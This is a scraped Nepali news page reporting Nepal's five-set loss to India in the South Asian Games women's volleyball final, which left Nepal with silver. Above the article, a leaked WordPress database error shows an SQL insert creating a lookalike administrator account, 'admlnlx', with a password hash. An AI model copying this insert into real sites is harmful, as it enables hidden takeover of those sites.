WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLzoFVV9sn6hnwfA7W3Dsm41ozHSas1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 15:06:12', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, काठमाडौं । दक्षिण एसियाली खेलकुद (साग) को महिला भलिबलतर्फ एक सेटले अगाडि परिसकेको नेपालले लय गुमाउँदा ऐतिहासिक स्वर्ण जित्नबाट चुकेको छ । उपराष्ट्रपति नन्दकुमार पुन पासाङसहित विशिष्ट व्यक्तिहरु पुगेर खेल हेरिरहँदा नेपाल जितको नजिक पुगेको थियो । तर, चौंथो सेटमा हार व्यहोरेपछि नेपालले पाचौं सेट गुमायो ।
पाचौं सेट भारतले १५-६ ले जित निकाल्यो । पहिलो सेट १७-२५ ले गुमाएको नेपालले दोस्रो सेट २५-२३ र तेस्रो सेट २५-२३ ले जित्यो । चौंथो सेट २५-२० ले गुमाउन पुग्यो ।
मंगलबार दशरथ रंगशालामा भएको खेलमा नेपालले निकै शानदार प्रदर्शन गर्यो । तर, अन्तिमतिर लय गुमायो । नेपाली खेलाडी प्रतिभा माली र सरस्वती चौधरीले उत्कृष्ट प्रदर्शन गर्दा सशक्त प्रदर्शन देखियो र जीतको सम्भावना बलियो भयो । भारत जस्तो भलिबलमा शक्तिशाली देशलाई नेपाली महिला भलिबल टोलीले कडा चुनौती दिए । हारका बाबजुद नेपालले रजत पदक जितेको छ ।